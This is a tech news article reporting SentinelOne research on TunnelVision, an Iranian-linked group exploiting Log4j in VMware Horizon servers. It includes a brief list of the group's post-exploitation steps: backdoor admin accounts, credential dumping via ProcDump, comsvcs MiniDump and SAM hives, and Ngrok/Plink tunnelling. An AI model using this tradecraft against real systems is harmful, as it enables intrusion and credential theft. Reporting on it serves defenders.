The Log4j vulnerability once again appeared in compromised systems after the state-sponsored hackers from Iran reportedly attacked the VMware users.
According to cybersecurity analysts, the notorious group behind this attack is TunnelVision.
TunnelVision Exploits Log4J Flaw
According to a comprehensive report by Sentinel Labs on Thursday, Feb. 17, the hackers became more popular when they hit Java-based logging utility Log4j.
Since then, they managed to gain access to thousands of apps by relying on remote code execution. During its peak time, it has become one of the most dreaded exploits that occurred on the internet. Experts believed that it would continue to haunt the users in the next few years.
Currently, the controversial group named TunnelVision focused on infecting VMware Horizon. Windows, Linux, and macOS users can run this virtualization product on desktops.
According to Yair Rigevsky and Amitai Ben Shushan Ehrlich from Sentinel One, the Iranian cybercriminals have been active in compromising VMware by deploying backdoors and collecting sensitive information from the victims.
On top of that, they also inject PowerShell commands, as well as create backdoor users. The security flaw started with the Log4j exploit wherein they gain commands through the PS reverse shells thanks to the Tomcat process.
Usually, VMware makes use of Apache Tomcat for the deployment of web applications in Java. From this server, the TunnelVision hackers were able to remotely control the networks.
Related Article: [BREAKING] Iranian Hackers 'Tutorial' Video of 'How-to-Hack' Gmail or Yahoo Accounts Gets Leaked!
What Iranian Hackers Do After Installing PowerShell
According to another report by Ars Technica, here's what the TunnelVision group does after finishing the setup.
Makes a backdoor user and include it in the network admin group.
Conduct execution of reconnaissance commands.
Utilizes ProcDump, comsvcs MiniDump, and SAM hive dumps for data collection.
Install Ngrok and Plink to launch remote desktop control.
Moreover, SentinelOne also observed that the Iranian hackers engaged in several "legitimate" services. As part of compromising VMware servers, these are the services that they are using.
transfer.sh
pastebin.com
webhook.site
ufile.io
raw.githubusercontent.com
"We track this cluster separately under the name TunnelVision. This does not imply we believe they are necessarily unrelated, only that there is at present insufficient data to treat them as identical to any of the aforementioned attributions," the SentinelOne experts said.
This is not the first time that the Log4j security flaw is used to deploy ransomware in VMware Horizon servers.
Last month, Tech Times spotted in a report that the Chinese hackers were allegedly responsible for infecting the platform with Nightsky ransomware.
According to the article, the hackers aimed to bring terror to the victims by demanding them a ransom. In return, they promised that they will not leak the personal information of the involved people.
Meanwhile, the tech site wrote in a different story that the North Korean hackers pulled off a new phishing campaign for Lockheed Martin applicants. The Lazarus group pretended to be a legit firm with the goal of sending malware to the victims through email attachments.
Read Also: Sugar Ransomware-as-a-Service Operations Target Individual Devices With Low Ransom Demands
This article is owned by Tech Times
Written by Joseph Henry